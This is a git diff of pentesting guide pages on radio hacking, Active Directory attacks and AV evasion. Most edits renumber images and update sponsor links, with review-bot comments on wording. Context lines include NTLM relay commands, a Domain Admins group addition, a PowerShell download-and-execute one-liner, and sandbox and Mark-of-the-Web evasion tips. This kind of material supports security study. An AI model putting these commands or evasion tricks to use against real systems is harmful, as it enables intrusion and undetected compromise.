It is also known as Manchester encoding. The logical value is defined by the polarity of the transition between pulse burst and space. "Space to pulse burst" denotes logic "0", "pulse burst to space" denotes logic "1".
-
+
**4. Combination of previous ones and other exotics**
@@ -60,7 +60,7 @@ Manufacturers love to use their own unique IR protocols, even within the same ra
The most reliable way to see how the remote IR signal looks like is to use an oscilloscope. It does not demodulate or invert the received signal, it is just displayed "as is". This is useful for testing and debugging. I will show the expected signal on the example of the NEC IR protocol.
-
+
Usually, there is a preamble at the beginning of an encoded packet. This allows the receiver to determine the level of gain and background. There are also protocols without preamble, for example, Sharp.
diff --git a/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md b/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md
index 5fe4b710f..314fb9619 100644
--- a/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md
+++ b/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md
@@ -22,7 +22,7 @@ BLE devices communicate is by sending **advertising packets** (**beacons**), the
The listening device, also called a central device, can respond to an advertising packet with a **SCAN request** sent specifically to the advertising device. The **response** to that scan uses the same structure as the **advertising** packet with additional information that couldn’t fit on the initial advertising request, such as the full device name.
-![](<../../.gitbook/assets/image (149).png>)
+![](<../../.gitbook/assets/image (152).png>)
The preamble byte synchronizes the frequency, whereas the four-byte access address is a **connection identifier**, which is used in scenarios where multiple devices are trying to establish connections on the same channels. Next, the Protocol Data Unit (**PDU**) contains the **advertising data**. There are several types of PDU; the most commonly used are ADV\_NONCONN\_IND and ADV\_IND. Devices use the **ADV\_NONCONN\_IND** PDU type if they **don’t accept connections**, transmitting data only in the advertising packet. Devices use **ADV\_IND** if they **allow connections** and **stop sending advertising** packets once a **connection** has been **established**.
diff --git a/todo/radio-hacking/pentesting-rfid.md b/todo/radio-hacking/pentesting-rfid.md
index 4a714fc76..98438f767 100644
--- a/todo/radio-hacking/pentesting-rfid.md
+++ b/todo/radio-hacking/pentesting-rfid.md
@@ -39,7 +39,7 @@ Most RFID **security controls** have mechanisms that **restrict** the **read** o
### Low & High frequency tags comparison
-
+
## Low-Frequency RFID Tags (125kHz)
@@ -74,7 +74,7 @@ It's usually found in bank cards, public transport, and other secure passes.
**High-frequency 13.56 MHz tags are a set of standards and protocols**. They are usually referred to as [NFC](https://nfc-forum.org/what-is-nfc/about-the-technology/), but that's not always correct. The basic protocol set used on the physical and logical levels is ISO 14443. High-level protocols, as well as alternative standards (like ISO 19092), are based upon it. Many people refer to this technology as **Near Field Communication (NFC)**, a term for devices operating over the 13.56 MHz frequency.
-
+
To put it simply, NFC's architecture works like this: the transmission protocol is chosen by the company making the cards and implemented based on the low-level ISO 14443. For example, NXP invented its own high-level transmission protocol called Mifare. But on the lower level, Mifare cards are based on ISO 14443-A standard.
diff --git a/todo/radio-hacking/sub-ghz-rf.md b/todo/radio-hacking/sub-ghz-rf.md
index ccd47544f..b4ed80d14 100644
--- a/todo/radio-hacking/sub-ghz-rf.md
+++ b/todo/radio-hacking/sub-ghz-rf.md
@@ -25,17 +25,17 @@ In Europe 433.92MHz is commonly used and in U.S. and Japan it's the 315MHz.
## **Brute-force Attack**
-
+
If instead of sending each code 5 times (sent like this to make sure the receiver gets it) so just send it once, the time is reduced to 6mins:
-
+
and if you **remove the 2 ms waiting** period between signals you can **reduce the time to 3minutes.**
Moreover, by using the De Bruijn Sequence (a way to reduce the number of bits needed to send all the potential binary numbers to burteforce) this **time is reduced just to 8 seconds**:
-
+
Example of this attack was implemented in [https://github.com/samyk/opensesame](https://github.com/samyk/opensesame)
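Review bot: Two context lines under "Brute-force Attack" need a wording fix while the figures around them are being swapped. "burteforce" in the De Bruijn sentence should be "bruteforce", and "If instead of sending each code 5 times (...) so just send it once" does not parse; "If each code is sent once instead of 5 times" would. The section also opens directly with a figure, so the starting duration that "reduced to 6mins" is measured against is not stated anywhere in the visible text; add it as a sentence.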
diff --git a/windows-hardening/active-directory-methodology/abusing-ad-mssql.md b/windows-hardening/active-directory-methodology/abusing-ad-mssql.md
index d0f8271a1..5e73f080d 100644
--- a/windows-hardening/active-directory-methodology/abusing-ad-mssql.md
+++ b/windows-hardening/active-directory-methodology/abusing-ad-mssql.md
@@ -12,11 +12,10 @@
-
+
{% embed url="https://websec.nl/" %}
-
## **MSSQL Enumeration / Discovery**
The powershell module [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) is very useful in this case.
@@ -155,7 +154,7 @@ From **Windows** you could also find the links and execute commands manually usi
_Login using Windows authentication:_
-![](<../../.gitbook/assets/image (805).png>)
+![](<../../.gitbook/assets/image (808).png>)
#### Find Trustable Links
@@ -164,7 +163,7 @@ select * from master..sysservers;
EXEC sp_linkedservers;
```
-![](<../../.gitbook/assets/image (713).png>)
+![](<../../.gitbook/assets/image (716).png>)
#### Execute queries in trustable link
@@ -178,7 +177,7 @@ select * from openquery("dcorp-sql1", 'select * from master..sysservers')
Check where double and single quotes are used, it's important to use them that way.
{% endhint %}
-![](<../../.gitbook/assets/image (640).png>)
+![](<../../.gitbook/assets/image (643).png>)
You can continue these trusted links chain forever manually.
@@ -210,8 +209,7 @@ A strategy that many authors have come up with is to force a SYSTEM service to a
[SweetPotato](https://github.com/CCob/SweetPotato) has a collection of these various techniques which can be executed via Beacon's `execute-assembly` command.
-
-
+
{% embed url="https://websec.nl/" %}
diff --git a/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md b/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
index 114adbf11..33b89a57e 100644
--- a/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
+++ b/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
{% embed url="https://websec.nl/" %}
@@ -170,7 +170,7 @@ Notable permissions applicable to certificate templates include:
An example of a privesc like the previous one:
-
+
ESC4 is when a user has write privileges over a certificate template. This can for instance be abused to overwrite the configuration of the certificate template to make the template vulnerable to ESC1.
@@ -412,7 +412,7 @@ Another limitation of NTLM relay attacks is that **an attacker-controlled machin
Certify.exe cas
```
-
+
The `msPKI-Enrollment-Servers` property is used by enterprise Certificate Authorities (CAs) to store Certificate Enrollment Service (CES) endpoints. These endpoints can be parsed and listed by utilizing the tool **Certutil.exe**:
@@ -420,14 +420,14 @@ The `msPKI-Enrollment-Servers` property is used by enterprise Certificate Author
certutil.exe -enrollmentServerURL -config DC01.DOMAIN.LOCAL\DOMAIN-CA
```
-
+
```powershell
Import-Module PSPKI
Get-CertificationAuthority | select Name,Enroll* | Format-List *
```
-
+
#### Abuse with Certify
@@ -638,9 +638,9 @@ Certificate Authorities
### Abuse Scenario
-It need to setup a relay server:
+It need to setup a relay server:
-``` bash
+```bash
$ certipy relay -target 'rpc://DC01.domain.local' -ca 'DC01-CA' -dc-ip 192.168.100.100
Certipy v4.7.0 - by Oliver Lyak (ly4k)
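Review bot: The replacement line "It need to setup a relay server:" carries over the grammar error of the line it replaces. Since this line is being rewritten anyway, make it "You need to set up a relay server:". The fence-tag cleanup in the same hunk (dropping the space before bash) is fine.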
@@ -663,7 +663,7 @@ Note: For domain controllers, we must specify `-template` in DomainController.
Or using [sploutchy's fork of impacket](https://github.com/sploutchy/impacket) :
-``` bash
+```bash
$ ntlmrelayx.py -t rpc://192.168.100.100 -rpc-mode ICPR -icpr-ca-name DC01-CA -smb2support
```
@@ -673,7 +673,7 @@ $ ntlmrelayx.py -t rpc://192.168.100.100 -rpc-mode ICPR -icpr-ca-name DC01-CA -s
Administrators can set up the Certificate Authority to store it on an external device like the "Yubico YubiHSM2".
-If USB device connected to the CA server via a USB port, or a USB device server in case of the CA server is a virtual machine, an authentication key (sometimes referred to as a "password") is required for the Key Storage Provider to generate and utilize keys in the YubiHSM.
+If USB device connected to the CA server via a USB port, or a USB device server in case of the CA server is a virtual machine, an authentication key (sometimes referred to as a "password") is required for the Key Storage Provider to generate and utilize keys in the YubiHSM.
This key/password is stored in the registry under `HKEY_LOCAL_MACHINE\SOFTWARE\Yubico\YubiHSM\AuthKeysetPassword` in cleartext.
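Review bot: The changed sentence "If USB device connected to the CA server via a USB port, or a USB device server in case of the CA server is a virtual machine, ..." is still ungrammatical after this edit, and the added and removed versions read identically. Suggested wording: "If the USB device is connected to the CA server through a USB port, or through a USB device server when the CA server is a virtual machine, an authentication key ... is required".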
@@ -683,7 +683,7 @@ Reference in [here](https://pkiblog.knobloch.info/esc12-shell-access-to-adcs-ca-
If the CA's private key stored on a physical USB device when you got a shell access, it is possible to recover the key.
-In first, you need to obtain the CA certificate (this is public) and then:
+In first, you need to obtain the CA certificate (this is public) and then:
```cmd
# import it to the user store with CA certificate
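Review bot: "In first, you need to obtain the CA certificate" is unchanged in substance by this edit and should read "First, obtain the CA certificate (it is public) and then:". The context line above it, "If the CA's private key stored on a physical USB device", is also missing "is". Separately, the block that follows is tagged cmd but its comment line starts with #, which cmd.exe does not treat as a comment; either retag the fence or use REM.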
@@ -695,14 +695,13 @@ $ certutil -csp "YubiHSM Key Storage Provider" -repairstore -user my
+
{% embed url="https://websec.nl/" %}
diff --git a/windows-hardening/active-directory-methodology/asreproast.md b/windows-hardening/active-directory-methodology/asreproast.md
index 43569cb51..3ca1e62f4 100644
--- a/windows-hardening/active-directory-methodology/asreproast.md
+++ b/windows-hardening/active-directory-methodology/asreproast.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@@ -120,7 +120,7 @@ ASRepCatcher listen
***
-
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
diff --git a/windows-hardening/active-directory-methodology/dcsync.md b/windows-hardening/active-directory-methodology/dcsync.md
index 22078efb6..927c1e56b 100644
--- a/windows-hardening/active-directory-methodology/dcsync.md
+++ b/windows-hardening/active-directory-methodology/dcsync.md
@@ -1,12 +1,12 @@
# DCSync
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=dcsync) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=dcsync" %}
@@ -105,10 +105,10 @@ Other ways to support HackTricks:
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=dcsync) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=dcsync" %}
diff --git a/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md b/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md
index 5bf7d3955..bbddda830 100644
--- a/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md
+++ b/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md
@@ -80,13 +80,13 @@ In the previous flow it was used the trust hash instead of the **clear text pass
The cleartext password can be obtained by converting the \[ CLEAR ] output from mimikatz from hexadecimal and removing null bytes ‘\x00’:
-![](<../../.gitbook/assets/image (935).png>)
+![](<../../.gitbook/assets/image (938).png>)
Sometimes when creating a trust relationship, a password must be typed in by the user for the trust. In this demonstration, the key is the original trust password and therefore human readable. As the key cycles (30 days), the cleartext will not be human-readable but technically still usable.
The cleartext password can be used to perform regular authentication as the trust account, an alternative to requesting a TGT using the Kerberos secret key of the trust account. Here, querying root.local from ext.local for members of Domain Admins:
-![](<../../.gitbook/assets/image (789).png>)
+![](<../../.gitbook/assets/image (792).png>)
## References
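Review bot: Both replaced references, `image (938).png` and `image (792).png`, have empty alt text, and each one is the only place where the step described by the preceding sentence is shown. The renumbering cannot be checked from the diff, so confirm in the rendered page that each new index still resolves to the same screenshot, and add alt text describing what it shows so the page stays readable if an asset index drifts again.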
diff --git a/windows-hardening/active-directory-methodology/kerberoast.md b/windows-hardening/active-directory-methodology/kerberoast.md
index 65a17f49b..cdd8026c8 100644
--- a/windows-hardening/active-directory-methodology/kerberoast.md
+++ b/windows-hardening/active-directory-methodology/kerberoast.md
@@ -1,12 +1,12 @@
# Kerberoast
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=kerberoast) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=kerberoast" %}
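Review bot: The new Trickest text link in this hunk has no `utm_term=trickest`, while the equivalent new links in dcsync.md and pass-the-ticket.md in this same patch include it. If the parameter set is meant to be uniform across pages, add it here and in the two later hunks of this file; if the omission is deliberate, say so in the commit message.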
@@ -117,13 +117,13 @@ Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASC
When a TGS is requested, Windows event `4769 - A Kerberos service ticket was requested` is generated.
{% endhint %}
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=kerberoast) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=kerberoast" %}
### Cracking
@@ -215,10 +215,10 @@ Other ways to support HackTricks:
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=kerberoast) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=kerberoast" %}
diff --git a/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md b/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md
index 1b6d96219..fbefa4012 100644
--- a/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md
+++ b/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md
@@ -12,7 +12,7 @@
-
+
{% embed url="https://websec.nl/" %}
@@ -115,7 +115,7 @@ icacls.exe "C:\Users\redsuit\Documents\ssh\OpenSSH-Win64" /grant Everyone:RX /T
* [https://learn.microsoft.com/en-gb/archive/blogs/sergey\_babkins\_blog/another-solution-to-multi-hop-powershell-remoting](https://learn.microsoft.com/en-gb/archive/blogs/sergey\_babkins\_blog/another-solution-to-multi-hop-powershell-remoting)
* [https://4sysops.com/archives/solve-the-powershell-multi-hop-problem-without-using-credssp/](https://4sysops.com/archives/solve-the-powershell-multi-hop-problem-without-using-credssp/)
-
+
{% embed url="https://websec.nl/" %}
diff --git a/windows-hardening/active-directory-methodology/laps.md b/windows-hardening/active-directory-methodology/laps.md
index e1c532be6..0021d36a4 100644
--- a/windows-hardening/active-directory-methodology/laps.md
+++ b/windows-hardening/active-directory-methodology/laps.md
@@ -12,7 +12,7 @@
-
+
{% embed url="https://websec.nl/" %}
@@ -139,7 +139,7 @@ Then, just compile the new `AdmPwd.PS.dll` and upload it to the machine in `C:\T
## References
* [https://4sysops.com/archives/introduction-to-microsoft-laps-local-administrator-password-solution/](https://4sysops.com/archives/introduction-to-microsoft-laps-local-administrator-password-solution/)
-
+
{% embed url="https://websec.nl/" %}
diff --git a/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md b/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md
index 76e88832c..2869301ed 100644
--- a/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md
+++ b/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md
@@ -12,7 +12,7 @@
-
+
{% embed url="https://websec.nl/" %}
@@ -54,7 +54,7 @@ To conform to operational security and use AES256, the following command can be
* [https://www.tarlogic.com/es/blog/como-atacar-kerberos/](https://www.tarlogic.com/es/blog/como-atacar-kerberos/)
-
+
{% embed url="https://websec.nl/" %}
diff --git a/windows-hardening/active-directory-methodology/pass-the-ticket.md b/windows-hardening/active-directory-methodology/pass-the-ticket.md
index 1bea8a033..05c564f5b 100644
--- a/windows-hardening/active-directory-methodology/pass-the-ticket.md
+++ b/windows-hardening/active-directory-methodology/pass-the-ticket.md
@@ -14,13 +14,13 @@ Other ways to support HackTricks:
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=pass-the-ticket) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pass-the-ticket" %}
## Pass The Ticket (PTT)
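Review bot: The added Trickest link here is written with Markdown escapes in the URL (`utm\_source`, `\&utm\_medium`), while the new links added to dcsync.md and kerberoast.md in this patch use the unescaped form, as does the embed line two lines below. Pick one form for all of them; the unescaped one matches the embed lines and avoids relying on the renderer to strip backslashes inside a link target. The second hunk of this file has the same line.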
@@ -68,13 +68,13 @@ klist #List tickets in cache to cehck that mimikatz has loaded the ticket
* [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=pass-the-ticket) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pass-the-ticket" %}
diff --git a/windows-hardening/active-directory-methodology/password-spraying.md b/windows-hardening/active-directory-methodology/password-spraying.md
index 4f21f01c9..0614e6309 100644
--- a/windows-hardening/active-directory-methodology/password-spraying.md
+++ b/windows-hardening/active-directory-methodology/password-spraying.md
@@ -79,7 +79,7 @@ python kerbrute.py -domain jurassic.park -users users.txt -password Password123
* With the `scanner/smb/smb_login` module of **Metasploit**:
-![](<../../.gitbook/assets/image (742).png>)
+![](<../../.gitbook/assets/image (745).png>)
* Using **rpcclient**:
diff --git a/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md b/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md
index 18ccdef42..c9c219deb 100644
--- a/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md
+++ b/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
{% embed url="https://websec.nl/" %}
@@ -148,7 +148,7 @@ Lear about the [**available service tickets here**](silver-ticket.md#available-s
* [https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution#modifying-target-computers-ad-object](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution#modifying-target-computers-ad-object)
* [https://stealthbits.com/blog/resource-based-constrained-delegation-abuse/](https://stealthbits.com/blog/resource-based-constrained-delegation-abuse/)
-
+
{% embed url="https://websec.nl/" %}
diff --git a/windows-hardening/authentication-credentials-uac-and-efs/README.md b/windows-hardening/authentication-credentials-uac-and-efs/README.md
index 9858f8314..0e69439fb 100644
--- a/windows-hardening/authentication-credentials-uac-and-efs/README.md
+++ b/windows-hardening/authentication-credentials-uac-and-efs/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
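Review bot: The Trickest link kept as context in this hunk still uses the old query string, `utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks`, including the "hacktrics" misspelling, which this patch replaces in dcsync.md, kerberoast.md and pass-the-ticket.md. This file is already being touched for the figure above it, so move the link to the new `utm_source`/`utm_medium`/`utm_campaign=ppc`/`utm_content` scheme here too; the same applies to the second hunk of this file and to uac-user-account-control.md.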
@@ -283,7 +283,7 @@ The SSPI will be in charge of finding the adequate protocol for two machines tha
[uac-user-account-control.md](uac-user-account-control.md)
{% endcontent-ref %}
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md b/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md
index aa7b2b113..e3c0cdc8a 100644
--- a/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md
+++ b/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
@@ -193,7 +193,7 @@ Also, using [this](https://en.wikipedia.org/wiki/Windows\_10\_version\_history)
You can get using a **meterpreter** session. Migrate to a **process** that has the **Session** value equals to **1**:
-![](<../../.gitbook/assets/image (860).png>)
+![](<../../.gitbook/assets/image (863).png>)
(_explorer.exe_ should works)
@@ -222,7 +222,7 @@ If you take a look to **UACME** you will note that **most UAC bypasses abuse a D
Consists on watching if an **autoElevated binary** tries to **read** from the **registry** the **name/path** of a **binary** or **command** to be **executed** (this is more interesting if the binary searches this information inside the **HKCU**).
-
+
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
diff --git a/windows-hardening/av-bypass.md b/windows-hardening/av-bypass.md
index fcdcfd492..3a9ac87f7 100644
--- a/windows-hardening/av-bypass.md
+++ b/windows-hardening/av-bypass.md
@@ -52,11 +52,11 @@ Dynamic analysis is when the AV runs your binary in a sandbox and watches for ma
It turns out that Microsoft Defender's Sandbox computername is HAL9TH, so, you can check for the computer name in your malware before detonation, if the name matches HAL9TH, it means you're inside defender's sandbox, so you can make your program exit.
-
+
Some other really good tips from [@mgeeky](https://twitter.com/mariuszbit) for going against Sandboxes
-
+
As we've said before in this post, **public tools** will eventually **get detected**, so, you should ask yourself something:
@@ -74,7 +74,7 @@ Whenever it's possible, always **prioritize using DLLs for evasion**, in my expe
As we can see in this image, a DLL Payload from Havoc has a detection rate of 4/26 in antiscan.me, while the EXE payload has a 7/26 detection rate.
-
+
Now we'll show some tricks you can use with DLL files to be much more stealthier.
@@ -130,7 +130,7 @@ These are the results:
Both our shellcode (encoded with [SGN](https://github.com/EgeBalci/sgn)) and the proxy DLL have a 0/26 Detection rate in [antiscan.me](https://antiscan.me)! I would call that a success.
-
+
{% hint style="info" %}
I **highly recommend** you watch [S3cur3Th1sSh1t's twitch VOD](https://www.twitch.tv/videos/1644171543) about DLL Sideloading and also [ippsec's video](https://www.youtube.com/watch?v=3eROsG\_WNpE) to learn more about what we've discussed more in-depth.
@@ -171,7 +171,7 @@ It allows antivirus solutions to inspect script behavior by exposing script cont
Running `IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')` will produce the following alert on Windows Defender.
-
+
Notice how it prepends `amsi:` and then the path to the executable from which the script ran, in this case, powershell.exe
@@ -251,13 +251,13 @@ You may have seen this screen when downloading some executables from the interne
Microsoft Defender SmartScreen is a security mechanism intended to protect the end user against running potentially malicious applications.
-
+
SmartScreen mainly works with a reputation-based approach, meaning that uncommonly download applications will trigger SmartScreen thus alerting and preventing the end user from executing the file (although the file can still be executed by clicking More Info -> Run anyway).
**MoTW** (Mark of The Web) is an [NTFS Alternate Data Stream](https://en.wikipedia.org/wiki/NTFS#Alternate\_data\_stream\_\(ADS\)) with the name of Zone.Identifier which is automatically created upon download files from the internet, along with the URL it was downloaded from.
-
+
{% hint style="info" %}
It's important to note that executables signed with a **trusted** signing certificate **won't trigger SmartScreen**.
@@ -265,7 +265,7 @@ It's important to note that executables signed with a **trusted** signing certif
A very effective way to prevent your payloads from getting the Mark of The Web is by packaging them inside some sort of container like an ISO. This happens because Mark-of-the-Web (MOTW) **cannot** be applied to **non NTFS** volumes.
-
+
[**PackMyPayload**](https://github.com/mgeeky/PackMyPayload/) is a tool that packages payloads into output containers to evade Mark-of-the-Web.
@@ -309,13 +309,13 @@ Most C2 frameworks (sliver, Covenant, metasploit, CobaltStrike, Havoc, etc.) alr
It involves **spawning a new sacrificial process**, inject your post-exploitation malicious code into that new process, execute your malicious code and when finished, kill the new process. This has both its benefits and its drawbacks. The benefit to the fork and run method is that execution occurs **outside** our Beacon implant process. This means that if something in our post-exploitation action goes wrong or gets caught, there is a **much greater chance** of our **implant surviving.** The drawback is that you have a **greater chance** of getting caught by **Behavioural Detections**.
-
+
* **Inline**
It's about injecting the post-exploitation malicious code **into its own process**. This way, you can avoid having to create a new process and getting it scanned by AV, but the drawback is that if something goes wrong with the execution of your payload, there's a **much greater chance** of **losing your beacon** as it could crash.
-
+
{% hint style="info" %}
If you want to read more about C# Assembly loading, please check out this article [https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/](https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/) and their InlineExecute-Assembly BOF ([https://github.com/xforcered/InlineExecute-Assembly](https://github.com/xforcered/InlineExecute-Assembly))
diff --git a/windows-hardening/basic-powershell-for-pentesters/powerview.md b/windows-hardening/basic-powershell-for-pentesters/powerview.md
index 9d3304f0d..3e658545a 100644
--- a/windows-hardening/basic-powershell-for-pentesters/powerview.md
+++ b/windows-hardening/basic-powershell-for-pentesters/powerview.md
@@ -12,7 +12,7 @@
-
+
{% embed url="https://websec.nl/" %}
@@ -348,7 +348,7 @@ Add-NetGroupUser -Username username -GroupName 'Domain Admins' -Domain my.domain
```
-
+
{% embed url="https://websec.nl/" %}
diff --git a/windows-hardening/lateral-movement/psexec-and-winexec.md b/windows-hardening/lateral-movement/psexec-and-winexec.md
index 4acfa0d1d..53e6bafbb 100644
--- a/windows-hardening/lateral-movement/psexec-and-winexec.md
+++ b/windows-hardening/lateral-movement/psexec-and-winexec.md
@@ -39,7 +39,7 @@ Find moe detailed steps in: [https://blog.ropnop.com/using-credentials-to-own-wi
**You could also use the Windows Sysinternals binary PsExec.exe:**
-![](<../../.gitbook/assets/image (925).png>)
+![](<../../.gitbook/assets/image (928).png>)
You could also use [**SharpLateral**](https://github.com/mertdas/SharpLateral):
diff --git a/windows-hardening/ntlm/README.md b/windows-hardening/ntlm/README.md
index 1f34b8b7a..bcd646980 100644
--- a/windows-hardening/ntlm/README.md
+++ b/windows-hardening/ntlm/README.md
@@ -37,7 +37,7 @@ You can check and configure which protocol will be used:
Execute _secpol.msc_ -> Local policies -> Security Options -> Network Security: LAN Manager authentication level. There are 6 levels (from 0 to 5).
-![](<../../.gitbook/assets/image (916).png>)
+![](<../../.gitbook/assets/image (919).png>)
### Registry
diff --git a/windows-hardening/windows-local-privilege-escalation/README.md b/windows-hardening/windows-local-privilege-escalation/README.md
index 99356af4b..491f70248 100644
--- a/windows-hardening/windows-local-privilege-escalation/README.md
+++ b/windows-hardening/windows-local-privilege-escalation/README.md
@@ -1357,7 +1357,7 @@ COM classes and interfaces are defined in the registry under **HKEY\_**_**CLASSE
Inside the CLSIDs of this registry you can find the child registry **InProcServer32** which contains a **default value** pointing to a **DLL** and a value called **ThreadingModel** that can be **Apartment** (Single-Threaded), **Free** (Multi-Threaded), **Both** (Single or Multi) or **Neutral** (Thread Neutral).
